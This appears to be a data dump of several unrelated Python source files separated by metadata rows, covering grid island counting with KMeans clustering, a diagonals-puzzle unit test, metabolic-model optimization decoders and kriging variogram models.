    Cleanups vs. the original: stray semicolons removed, neighbour offsets
    expressed as (row, col) pairs, `== False` replaced with `not`, and the
    visited matrix built with a comprehension.  Behaviour is unchanged.
    """

    def __init__(self, row, col, g):
        self.ROW = row    # number of rows in the grid
        self.COL = col    # number of columns in the grid
        self.graph = g    # 2D grid of 0/1 cells

    def isSafe(self, i, j, visited):
        """True when (i, j) is inside the grid, unvisited, and a 1-cell."""
        return (0 <= i < self.ROW and 0 <= j < self.COL
                and not visited[i][j] and self.graph[i][j])

    def DFS(self, i, j, visited):
        """Mark the whole 8-connected component containing (i, j) as visited.

        Recursive; very large components could hit Python's recursion limit.
        """
        visited[i][j] = True
        for di, dj in ((-1, -1), (-1, 0), (-1, 1), (0, -1),
                       (0, 1), (1, -1), (1, 0), (1, 1)):
            if self.isSafe(i + di, j + dj, visited):
                self.DFS(i + di, j + dj, visited)

    def countIslands(self):
        """Return the number of 8-connected components of 1-cells."""
        visited = [[False] * self.COL for _ in range(self.ROW)]
        count = 0
        for i in range(self.ROW):
            for j in range(self.COL):
                if not visited[i][j] and self.graph[i][j] == 1:
                    self.DFS(i, j, visited)
                    count += 1
        return count
def points(data, h, w):
    """Append the [row, col] coordinates of every 1-cell in *data* to the
    module-level ``pointsarray`` list (mutates the global; returns nothing)."""
    for row_idx in range(h):
        for col_idx in range(w):
            if data[row_idx][col_idx] == 1:
                pointsarray.append([row_idx, col_idx])
def kmean(N, pointsarray):
    """Cluster shot coordinates into N clusters and return the centroids
    scaled back to pixel coordinates (patch index * 25 + 12, the patch centre).

    Args:
        N: number of clusters.
        pointsarray: list of [row, col] patch coordinates.

    Returns:
        Scaled centroid array, or 0 when there are no points (original
        sentinel behaviour preserved).
    """
    print("---------------------")
    print("pointsarray")
    print(pointsarray)
    if len(pointsarray) == 0:
        centroid = 0
    else:
        # KMeans with a fixed random_state is deterministic, so the original
        # 101-iteration retry loop recomputed the same result every pass;
        # fitting once is equivalent and ~100x cheaper.
        kmeans = KMeans(n_clusters=N, random_state=0).fit(pointsarray)
        centroid = (kmeans.cluster_centers_ * 25) + 12
    return centroid
def mpi(N, pointsarray):
    """Cluster shot coordinates into N clusters and return the integer centroids
    (mean point of impact per cluster, in patch coordinates).

    Args:
        N: number of clusters.
        pointsarray: list of [row, col] patch coordinates.

    Returns:
        Integer centroid array, or [[0, 0]] when there are no points.
    """
    print('This is pointsarray')
    print(pointsarray)
    if len(pointsarray) <= 0:
        cen_int = [[0, 0]]
    else:
        # KMeans with a fixed random_state is deterministic, so the original
        # 101-iteration retry loop recomputed the same result every pass;
        # fitting once is equivalent.  The unused pointsarrayfiltered local
        # was dropped.
        kmeans = KMeans(n_clusters=N, random_state=0).fit(pointsarray)
        cen_int = kmeans.cluster_centers_.astype(int)
    return cen_int
if __name__ == "__main__":
    # load_model presumably restores the TF graph/session globals used by
    # patchIdentification — verify; then start the Flask development server.
    load_model()
    app.run()
| 44.512666
| 566
| 0.471381
| 50,031
| 442,812
| 3.841318
| 0.014171
| 0.063439
| 0.057158
| 0.021745
| 0.923506
| 0.897687
| 0.868986
| 0.848797
| 0.831303
| 0.817769
| 0
| 0.034216
| 0.434047
| 442,812
| 9,948
| 567
| 44.512666
| 0.732649
| 0.003559
| 0
| 0.784938
| 0
| 0.000121
| 0.038095
| 0.017973
| 0.000121
| 0
| 0
| 0
| 0
| 1
| 0.020999
| false
| 0.000965
| 0.003983
| 0.004465
| 0.050447
| 0.035482
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
494a9ea9f182d3c767f141134195db9bec1dedd3
| 2,289
|
py
|
Python
|
src/tests/test_diagonals.py
|
victuxbb/DiagonalsPuzzle
|
807a2c797eef45b4edcb600c2f92f7cb70ee4b34
|
[
"MIT"
] | null | null | null |
src/tests/test_diagonals.py
|
victuxbb/DiagonalsPuzzle
|
807a2c797eef45b4edcb600c2f92f7cb70ee4b34
|
[
"MIT"
] | null | null | null |
src/tests/test_diagonals.py
|
victuxbb/DiagonalsPuzzle
|
807a2c797eef45b4edcb600c2f92f7cb70ee4b34
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from src.com.victuxbb.diagonals.diagonals import Diagonals
class TestDiagonals(TestCase):
    """Checks for Diagonals.can_be_extended_to_solution on a 3x3 / 6-diagonal puzzle."""

    @classmethod
    def setUpClass(cls):
        # A single shared instance suffices: the checks below are read-only.
        cls._diagonals = Diagonals(size=3, diagonals=6)

    def test_given_BL_TR_with_left_cell_diagonal_error_it_should_return_false(self):
        state = [2, 2, 2, 1, -1, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=3))

    def test_given_BL_TR_with_bottom_left_cell_diagonal_error_it_should_return_false(self):
        state = [2, 2, 2, 0, 1, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=4))

    def test_given_BL_TR_with_bottom_cell_diagonal_error_it_should_return_false(self):
        state = [2, 1, -1, -1, 1, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=1))

    def test_given_BR_TL_with_left_cell_diagonal_error_it_should_return_false(self):
        state = [1, 1, 1, 1, 2, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=4))

    def test_given_BR_TL_with_bottom_cell_diagonal_error_it_should_return_false(self):
        state = [1, 2, -1, -1, -1, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=1))

    def test_given_BR_TL_with_top_left_cell_diagonal_error_it_should_return_false(self):
        state = [0, 2, 2, 1, 2, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=4))

    def test_given_number_of_cells_not_processed_it_should_not_try_to_extend(self):
        state = [1, 0, 0, 0, 0, -1, -1, -1, -1]
        self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=4))

    def test_given_number_of_cells_not_processed_it_should_try_to_extend(self):
        state = [1, 1, 1, 0, 0, 0, 1, -1, -1]
        self.assertTrue(self._diagonals.can_be_extended_to_solution(perm=state, last_inserted=6))
| 54.5
| 110
| 0.750983
| 355
| 2,289
| 4.385915
| 0.160563
| 0.048812
| 0.05395
| 0.046243
| 0.876686
| 0.876044
| 0.854849
| 0.794477
| 0.793192
| 0.793192
| 0
| 0.04173
| 0.141547
| 2,289
| 41
| 111
| 55.829268
| 0.750636
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.3
| false
| 0
| 0.066667
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
494dd9017df26b3ac0115e4a66eb0c332b81ab84
| 54
|
py
|
Python
|
homeworks/aleksey_gukov/hw05/level01.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
homeworks/aleksey_gukov/hw05/level01.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | 8
|
2019-11-15T18:15:56.000Z
|
2020-02-03T18:05:05.000Z
|
homeworks/nikita_marchenkov/hw05/level01.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
def summa(name_a, name_b):
    """Return the result of applying ``+`` to the two operands
    (numeric addition, or concatenation for sequences)."""
    total = name_a + name_b
    return total
| 18
| 26
| 0.703704
| 11
| 54
| 3.090909
| 0.545455
| 0.294118
| 0.529412
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.203704
| 54
| 2
| 27
| 27
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
498fbbf67b7f4e7ab502ebcb370524198d755cfd
| 216
|
py
|
Python
|
fastface/utils/__init__.py
|
mdornseif/fastface
|
72772db1fae4af17e829cd5479c4848fe5eb8948
|
[
"MIT"
] | 72
|
2021-01-03T05:43:56.000Z
|
2021-09-17T06:09:35.000Z
|
fastface/utils/__init__.py
|
mdornseif/fastface
|
72772db1fae4af17e829cd5479c4848fe5eb8948
|
[
"MIT"
] | 3
|
2021-09-23T22:26:57.000Z
|
2021-10-31T10:11:48.000Z
|
fastface/utils/__init__.py
|
mdornseif/fastface
|
72772db1fae4af17e829cd5479c4848fe5eb8948
|
[
"MIT"
] | 6
|
2021-02-15T19:58:57.000Z
|
2021-08-19T12:46:41.000Z
|
from . import box, cache, cluster, config, geo, kernel, preprocess, random, vis
__all__ = [
"box",
"cache",
"cluster",
"config",
"geo",
"kernel",
"preprocess",
"random",
"vis",
]
| 15.428571
| 79
| 0.532407
| 21
| 216
| 5.285714
| 0.571429
| 0.144144
| 0.27027
| 0.378378
| 0.882883
| 0.882883
| 0.882883
| 0.882883
| 0.882883
| 0
| 0
| 0
| 0.287037
| 216
| 13
| 80
| 16.615385
| 0.720779
| 0
| 0
| 0
| 0
| 0
| 0.226852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b8cf4dcffa8289a56dbf81174f41023163bb024d
| 436
|
py
|
Python
|
wrappers/serial/visibility/iterators.py
|
ChrisHad/algorithm-reference-library
|
bded1b62ea801ea4f4f5bd0794c18cd81d4b2810
|
[
"Apache-2.0"
] | 22
|
2016-12-14T11:20:07.000Z
|
2021-08-13T15:23:41.000Z
|
wrappers/serial/visibility/iterators.py
|
ChrisHad/algorithm-reference-library
|
bded1b62ea801ea4f4f5bd0794c18cd81d4b2810
|
[
"Apache-2.0"
] | 30
|
2017-06-27T09:15:38.000Z
|
2020-09-11T18:16:37.000Z
|
wrappers/serial/visibility/iterators.py
|
ChrisHad/algorithm-reference-library
|
bded1b62ea801ea4f4f5bd0794c18cd81d4b2810
|
[
"Apache-2.0"
] | 20
|
2017-07-02T03:45:49.000Z
|
2019-12-11T17:19:01.000Z
|
""" Visibility iterators for iterating through a BlockVisibility or Visibility.
"""
from processing_components.visibility.iterators import vis_null_iter
from processing_components.visibility.iterators import vis_timeslice_iter
from processing_components.visibility.iterators import vis_timeslices
from processing_components.visibility.iterators import vis_wslices
from processing_components.visibility.iterators import vis_wslice_iter
| 48.444444
| 79
| 0.887615
| 52
| 436
| 7.192308
| 0.365385
| 0.304813
| 0.320856
| 0.454545
| 0.716578
| 0.716578
| 0.716578
| 0.299465
| 0
| 0
| 0
| 0
| 0.073395
| 436
| 8
| 80
| 54.5
| 0.925743
| 0.172018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
770df31c38181a699d81959b07f94446f824d818
| 15,563
|
py
|
Python
|
src/optimModels/optimization/decoders.py
|
BioSystemsUM/optimModels
|
41e8ec5e99a66052fc8b547b60f979d2a2fd669d
|
[
"Apache-2.0"
] | 1
|
2020-01-09T08:58:05.000Z
|
2020-01-09T08:58:05.000Z
|
src/optimModels/optimization/decoders.py
|
BioSystemsUM/optimModels
|
41e8ec5e99a66052fc8b547b60f979d2a2fd669d
|
[
"Apache-2.0"
] | null | null | null |
src/optimModels/optimization/decoders.py
|
BioSystemsUM/optimModels
|
41e8ec5e99a66052fc8b547b60f979d2a2fd669d
|
[
"Apache-2.0"
] | 2
|
2020-01-16T16:15:28.000Z
|
2020-01-21T16:31:20.000Z
|
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
from optimModels.simulation.simul_problems import KineticSimulationProblem, StoicSimulationProblem, GeckoSimulationProblem
from optimModels.simulation.override_simul_problem import OverrideKineticSimulProblem, OverrideStoicSimulProblem
from optimModels.utils.configurations import StoicConfigurations
class Decoder(metaclass=ABCMeta):
    """
    Abstract class with the abstract methods that must be implemented by all decoders.
    """
    # The original assigned ``__metaclass__ = ABCMeta`` inside the class body,
    # which is Python 2 syntax and silently ignored on Python 3, so the
    # @abstractmethod decorators were not enforced.  Declaring the metaclass
    # in the class header restores the intended abstract behaviour; every
    # subclass in this module already implements both abstract methods.

    @abstractmethod
    def get_override_simul_problem(self, candidate, simulProblem):
        """Build an override simulation problem from a decoded candidate."""
        pass

    @abstractmethod
    def decode_candidate(self, candidate):
        """Translate the internal candidate representation into model identifiers."""
        pass

    def __getstate__(self):
        # Shallow copy so pickling does not hand out the live __dict__.
        state = self.__dict__.copy()
        return state

    def __setstate__(self, state):
        self.__dict__.update(state)
class DecoderMediumLevels(Decoder):
    """Decoder for medium optimization where each drain carries an expression level."""

    def __init__(self, ids, levels):
        # ids: candidate parameter identifiers; levels: admissible expression levels.
        self.ids = ids
        self.levels = levels

    def decode_candidate(self, candidate):
        """Convert *{parameterIndex : levelIndex}* pairs into *{parameterId: levelOfExpression}*.

        Args:
            candidate: iterable of (parameter index, level index) pairs.

        Returns:
            dict mapping each parameter id to its level of expression (values
            between 0 and 1 mean under-expression, above 1 over-expression).
        """
        return {self.ids[p_idx]: self.levels[l_idx]
                for (p_idx, l_idx) in list(candidate)}

    def decode_candidate_ids_to_index(self, identifiers):
        """Convert (parameter id, level id) pairs into (index, index) tuples.

        Args:
            identifiers: mapping of parameter id to level id.

        Returns:
            List of (parameter index, level index) tuples.
        """
        return [(self.ids.index(p_id), self.levels.index(l_id))
                for p_id, l_id in identifiers.items()]

    def get_override_simul_problem(self, candidate, simulProblem):
        """Create an OverrideStoicSimulProblem for the decoded candidate.

        Args:
            candidate: candidate to decode.
            simulProblem: simulation problem instance.

        Raises:
            Exception: when simulProblem is not a StoicSimulationProblem.
        """
        uptake = self.decode_candidate(candidate)
        drains = [r for r in simulProblem.get_drains()
                  if r not in simulProblem.get_constraints_reacs()
                  and r not in simulProblem.objective.keys()]
        if isinstance(simulProblem, StoicSimulationProblem):
            # close all drains to uptake and open only the reaction in candidate
            constraints = {
                r_id: ((-1 * uptake[r_id], 0) if r_id in uptake.keys()
                       else (0, StoicConfigurations.DEFAULT_UB))
                for r_id in drains
            }
            override = OverrideStoicSimulProblem(constraints=constraints)
        else:
            raise Exception("Unknown simulation problem type by DecoderMedium.")
        return override
class DecoderMediumReacKO(Decoder):
    """Decoder combining medium composition (open drains) with reaction knockouts."""

    def __init__(self, idsDrains, idsReactions):
        self.drains = idsDrains        # drain reaction identifiers
        self.reactions = idsReactions  # knockout-candidate reaction identifiers

    def decode_candidate(self, candidate):
        """Map (drain indexes, reaction indexes) to (drain ids, reaction ids).

        Args:
            candidate: pair of index lists (drains, knockouts).

        Returns:
            Tuple (drain ids, knocked-out reaction ids).
        """
        open_drains = [self.drains[idx] for idx in list(candidate[0])]
        knockouts = [self.reactions[idx] for idx in list(candidate[1])]
        return open_drains, knockouts

    def decode_candidate_ids_to_index(self, identifiers):
        """Map (drain ids, reaction ids) back to their index lists.

        Args:
            identifiers: pair of identifier lists (drains, knockouts).

        Returns:
            Tuple (drain indexes, knockout indexes).
        """
        drain_idxs = [self.drains.index(d) for d in identifiers[0]]
        ko_idxs = [self.reactions.index(r) for r in identifiers[1]]
        return drain_idxs, ko_idxs

    def get_override_simul_problem(self, candidate, simulProblem):
        """Build the override problem: KO reactions fixed to 0, selected drains opened.

        Args:
            candidate: encoded (drains, knockouts) index lists.
            simulProblem: simulation problem instance.

        Raises:
            Exception: when simulProblem is not a StoicSimulationProblem.
        """
        uptake, koReactions = self.decode_candidate(candidate)
        if not isinstance(simulProblem, StoicSimulationProblem):
            raise Exception("Unknown simulation problem type by DecoderMediumReacKO.")
        # close all drains to uptake and open only the reaction in candidate
        constraints = {ko: (0, 0) for ko in koReactions}
        for drain in self.drains:
            constraints[drain] = ((StoicConfigurations.DEFAULT_LB, 0) if drain in uptake
                                  else (0, StoicConfigurations.DEFAULT_UB))
        return OverrideStoicSimulProblem(constraints=constraints)
class DecoderMedium(Decoder):
    """Decoder for medium optimization: candidates select which drains are open."""

    def __init__(self, ids):
        self.ids = ids  # drain reaction identifiers

    def decode_candidate(self, candidate):
        """Convert a list of indexes into a list of identifiers.

        Args:
            candidate: indexes of parameters.

        Returns:
            List of parameter identifiers.
        """
        return [self.ids[idx] for idx in list(candidate)]

    def decode_candidate_ids_to_index(self, identifiers):
        """Convert a list of identifiers into the corresponding index list.

        Args:
            identifiers: ids of parameters.

        Returns:
            List of integer indexes.
        """
        return [self.ids.index(p_id) for p_id in identifiers]

    def get_override_simul_problem(self, candidate, simulProblem):
        """Build the override problem opening only the candidate drains for uptake.

        Args:
            candidate: indexes of drains that will be open.
            simulProblem: simulation problem instance.

        Raises:
            Exception: when simulProblem is not a StoicSimulationProblem.
        """
        uptake = self.decode_candidate(candidate)
        if not isinstance(simulProblem, StoicSimulationProblem):
            raise Exception("Unknown simulation problem type by DecoderMedium.")
        # close all drains to uptake and open only the reaction in candidate
        constraints = {}
        for drain in self.ids:
            if drain in uptake:
                constraints[drain] = (StoicConfigurations.DEFAULT_LB, 0)
            else:
                constraints[drain] = (0, StoicConfigurations.DEFAULT_UB)
        return OverrideStoicSimulProblem(constraints=constraints)
class DecoderReacKnockouts(Decoder):
    """Decoder for reaction-knockout candidates (kinetic or stoichiometric models)."""

    def __init__(self, ids):
        self.ids = ids  # knockout-candidate reaction identifiers

    def decode_candidate(self, candidate):
        """Convert a list of indexes into a list of reaction identifiers.

        Args:
            candidate: indexes of reactions.

        Returns:
            List of reaction identifiers.
        """
        return [self.ids[idx] for idx in list(candidate)]

    def decode_candidate_ids_to_index(self, identifiers):
        """Convert a list of reaction identifiers into their indexes.

        Args:
            identifiers: ids of reactions.

        Returns:
            List of integer indexes.
        """
        return [self.ids.index(r_id) for r_id in identifiers]

    def get_override_simul_problem(self, candidate, simulProblem):
        """Build the override problem that forces the candidate reactions to zero flux.

        Args:
            candidate: indexes of reactions to knock out.
            simulProblem: simulation problem instance.

        Raises:
            Exception: when simulProblem is neither kinetic nor stoichiometric.
        """
        ko = self.decode_candidate(candidate)
        if isinstance(simulProblem, KineticSimulationProblem):
            # Kinetic models take per-reaction scaling factors; 0 == knockout.
            factors = OrderedDict((r_id, 0) for r_id in ko)
            override = OverrideKineticSimulProblem(factors=factors)
        elif isinstance(simulProblem, StoicSimulationProblem):
            # Stoichiometric models take (lb, ub) bounds; (0, 0) == knockout.
            override = OverrideStoicSimulProblem(
                constraints={r_id: (0, 0) for r_id in ko})
        else:
            raise Exception("Unknown simulation problem type by DecoderReacKnockouts.")
        return override
class DecoderReacUnderOverExpression(Decoder):
    """Decoder for reaction under/over-expression candidates (kinetic models only)."""

    def __init__(self, ids, levels):
        self.ids = ids        # reaction identifiers
        self.levels = levels  # admissible expression levels

    def decode_candidate(self, candidate):
        """Convert *{parameterIndex : levelIndex}* pairs into *{parameterId: levelOfExpression}*.

        Args:
            candidate: iterable of (reaction index, level index) pairs.

        Returns:
            dict mapping each reaction id to its expression level (below 1 is
            under-expression, above 1 over-expression).
        """
        return {self.ids[r_idx]: self.levels[l_idx]
                for (r_idx, l_idx) in list(candidate)}

    def decode_candidate_ids_to_index(self, identifiers):
        """Convert (reaction id, level id) pairs into (index, index) tuples.

        Args:
            identifiers: mapping of reaction id to level id.

        Returns:
            List of (reaction index, level index) tuples.
        """
        return [(self.ids.index(r_id), self.levels.index(l_id))
                for r_id, l_id in identifiers.items()]

    def get_override_simul_problem(self, candidate, simulProblem):
        """Build the override problem applying the under/over expression factors.

        Args:
            candidate: candidate encoded as (reaction index, level index) pairs.
            simulProblem: simulation problem instance.

        Raises:
            Exception: when simulProblem is not a KineticSimulationProblem.
        """
        if not isinstance(simulProblem, KineticSimulationProblem):
            raise Exception("Unknown simulation problem type by decoderUnderOverExpression")
        factors = self.decode_candidate(candidate)
        return OverrideKineticSimulProblem(factors=factors)
class DecoderProtKnockouts(Decoder):
    """Decoder for protein-knockout candidates on GECKO models."""

    def __init__(self, ids):
        self.ids = ids  # protein identifiers

    def decode_candidate(self, candidate):
        """Convert a list of indexes into a list of protein identifiers.

        Args:
            candidate: indexes of proteins.

        Returns:
            List of protein identifiers.
        """
        return [self.ids[idx] for idx in list(candidate)]

    def decode_candidate_ids_to_index(self, identifiers):
        """Convert a list of protein identifiers into their indexes.

        Args:
            identifiers: ids of proteins.

        Returns:
            List of integer indexes.
        """
        return [self.ids.index(p_id) for p_id in identifiers]

    def get_override_simul_problem(self, candidate, simulProblem):
        """Build the override problem closing the draw reactions of the KO proteins.

        Args:
            candidate: indexes of proteins to knock out.
            simulProblem: simulation problem instance.

        Raises:
            Exception: when simulProblem is not a GeckoSimulationProblem.
        """
        # GECKO exposes protein usage through "draw_prot_<id>" pseudo-reactions.
        ko = ["draw_prot_" + p for p in self.decode_candidate(candidate)]
        if not isinstance(simulProblem, GeckoSimulationProblem):
            raise Exception("Unknown simulation problem type by DecoderProtKnockouts.")
        constraints = {draw: (0, 0) for draw in ko}
        return OverrideStoicSimulProblem(constraints=constraints)
class DecoderProtUnderOverExpression(Decoder):
    """Decoder for protein under/over-expression candidates on GECKO models."""

    def __init__(self, ids, levels):
        self.ids = ids        # protein identifiers
        self.levels = levels  # admissible expression levels

    def decode_candidate(self, candidate):
        """
        Convert the map of type *{proteinIndex : levelIndex}* to a map of type *{proteinId: levelOfExpression}*
        Args:
            candidate (dict): The key is the parameter index and the value is the level of expression index.
        Returns: A dictionary where the key is the protein id and the value is the level of expression with values between
        0 and 1 to represent under expression or higher that 1 to represent the over expression.
        """
        return {self.ids[k]: (0, self.levels[v]) for (k, v) in list(candidate)}

    def decode_candidate_ids_to_index(self, identifiers):
        """ Convert the list of tuples of identifiers into a list of tuples of integers (indexes).
        Args:
            identifiers (list): List of tuples with the proteins and levels ids
        Returns: List of tuples indexes.
        """
        return [(self.ids.index(x), self.levels.index(y)) for x, y in identifiers.items()]

    def get_override_simul_problem(self, candidate, simulProblem):
        """ Build the override simulation problem with the under/over protein expression bounds.
        Args:
            candidate (dict): candidate represented using proteins and levels indexes.
            simulProblem (SimulationProblem): all information required to perform a model simulation.
        Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
        Raises:
            Exception: when simulProblem is not a GeckoSimulationProblem.
        """
        if isinstance(simulProblem, GeckoSimulationProblem):
            solDecoded = self.decode_candidate(candidate)
            # FIX: the prefix was "draw_prot" (no underscore), inconsistent with
            # DecoderProtKnockouts and with GECKO's "draw_prot_<id>" pseudo-reaction
            # naming, so the constraints targeted non-existent reactions.
            constraints = {"draw_prot_" + k: v for k, v in solDecoded.items()}
            override = OverrideStoicSimulProblem(constraints=constraints)
        else:
            raise Exception("Unknown simulation problem type by decoderUnderOverExpression")
        return override
| 40.21447
| 196
| 0.667031
| 1,771
| 15,563
| 5.785997
| 0.099944
| 0.021665
| 0.026349
| 0.017176
| 0.809017
| 0.795355
| 0.774959
| 0.745974
| 0.733483
| 0.719137
| 0
| 0.002541
| 0.266594
| 15,563
| 386
| 197
| 40.318653
| 0.895216
| 0.416372
| 0
| 0.708075
| 0
| 0
| 0.05026
| 0.011637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.198758
| false
| 0.012422
| 0.031056
| 0
| 0.42236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
770ebd1539c075f7666098635e796af66dfb3791
| 3,473
|
py
|
Python
|
src/fast_krig/models.py
|
tim-a-davis/fast_krig
|
633773423ca5a8a93c2e28106d7822e661da8338
|
[
"MIT"
] | null | null | null |
src/fast_krig/models.py
|
tim-a-davis/fast_krig
|
633773423ca5a8a93c2e28106d7822e661da8338
|
[
"MIT"
] | null | null | null |
src/fast_krig/models.py
|
tim-a-davis/fast_krig
|
633773423ca5a8a93c2e28106d7822e661da8338
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.optimize import curve_fit
import functools
import fast_krig as fk
class Exponential:
    """Exponential semi-variogram model: gamma(h) = sill * (1 - exp(-h / range))."""

    def __init__(self, krig_range: float = None, sill: float = None):
        """Store the (optional) range and sill; missing values can be fitted later.

        Args:
            krig_range (float, optional): The max range of the model. Defaults to None.
            sill (float, optional): The max variance of the model. Defaults to None.
        """
        self.range = krig_range
        self.sill = sill

    def autofit(self, dist, vals):
        """Fit any missing variogram parameters to the experimental data.

        Args:
            dist (np.ndarray): The distance matrix on which to fit.
            vals (np.ndarray): The associated values for the distance array.

        Raises:
            Exception: if the least-squares fit diverges (infinite covariance).
        """
        # Both parameters supplied up front: nothing left to fit.
        if self.range and self.sill:
            return
        if not self.sill:
            # Estimate the sill as the mean experimental variance.
            self.sill = vals.mean()
        # Bind the sill so curve_fit only optimizes the range parameter.
        bound_model = functools.partial(self.variogram, self.sill)
        params, covariance = curve_fit(bound_model, dist, vals, p0=(dist.mean()))
        if np.isinf(covariance.squeeze()):
            raise Exception("Bad auto fit")
        self.range = params[0]

    @staticmethod
    def variogram(sill, dist, krig_range):
        """Evaluate the exponential model.

        Args:
            sill (float): The maximum variance of the model.
            dist (np.ndarray): The distance matrix.
            krig_range (float): The maximum range of the model.

        Returns:
            np.array: The exponential output from the model inputs.
        """
        return sill * (1 - np.exp(-dist / krig_range))

    def __call__(self, dist):
        """Evaluate the model at `dist` using the stored sill and range."""
        return self.variogram(self.sill, dist, self.range)
class Gaussian:
    """Gaussian semi-variogram model: gamma(h) = sill * (1 - exp(-h^2 / range^2))."""

    def __init__(self, krig_range: float = None, sill: float = None):
        """The initialization of this variogram model only requires a range and sill.

        Args:
            krig_range (float, optional): The max range of the model. Defaults to None.
            sill (float, optional): The max variance of the model. Defaults to None.
        """
        self.range = krig_range
        self.sill = sill

    def autofit(self, dist, vals):
        """Autofit any missing variogram parameters to the experimental data.

        Args:
            dist (np.ndarray): The distance matrix on which to fit.
            vals (np.ndarray): The associated values for the distance array.

        Raises:
            Exception: if the least-squares fit diverges (infinite covariance).
        """
        # Both parameters already supplied: skip fitting so a user-provided
        # range is not overwritten (consistent with Exponential.autofit).
        if self.range and self.sill:
            return
        if not self.sill:
            # Estimate the sill as the mean experimental variance.
            self.sill = vals.mean()
        # Bind the sill so curve_fit only optimizes the range parameter.
        func = functools.partial(self.variogram, self.sill)
        popt, pcov = curve_fit(func, dist, vals, p0=(dist.mean()))
        if np.isinf(pcov.squeeze()):
            raise Exception("Bad auto fit")
        self.range = popt[0]

    @staticmethod
    def variogram(sill, dist, krig_range):
        """Static method to calculate the Gaussian model.

        Args:
            sill (float): The maximum variance of the model.
            dist (np.ndarray): The distance matrix.
            krig_range (float): The maximum range of the model.

        Returns:
            np.array: The Gaussian output from the model inputs.
        """
        return sill * (1 - np.exp(-np.square(dist) / np.square(krig_range)))

    def __call__(self, dist):
        """Evaluate the model at `dist` using the stored sill and range."""
        return self.variogram(self.sill, dist, self.range)
| 33.718447
| 87
| 0.605528
| 436
| 3,473
| 4.75
| 0.201835
| 0.052149
| 0.038629
| 0.036697
| 0.866248
| 0.866248
| 0.866248
| 0.866248
| 0.866248
| 0.866248
| 0
| 0.002473
| 0.301468
| 3,473
| 102
| 88
| 34.04902
| 0.851195
| 0.445724
| 0
| 0.75
| 0
| 0
| 0.014898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.1
| 0.05
| 0.475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6278f33b0cf6f57aa036823bf2b42713b3bd316e
| 10,168
|
py
|
Python
|
z2/part2/interactive/jm/random_fuzzy_arrows_1/835134250.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 1
|
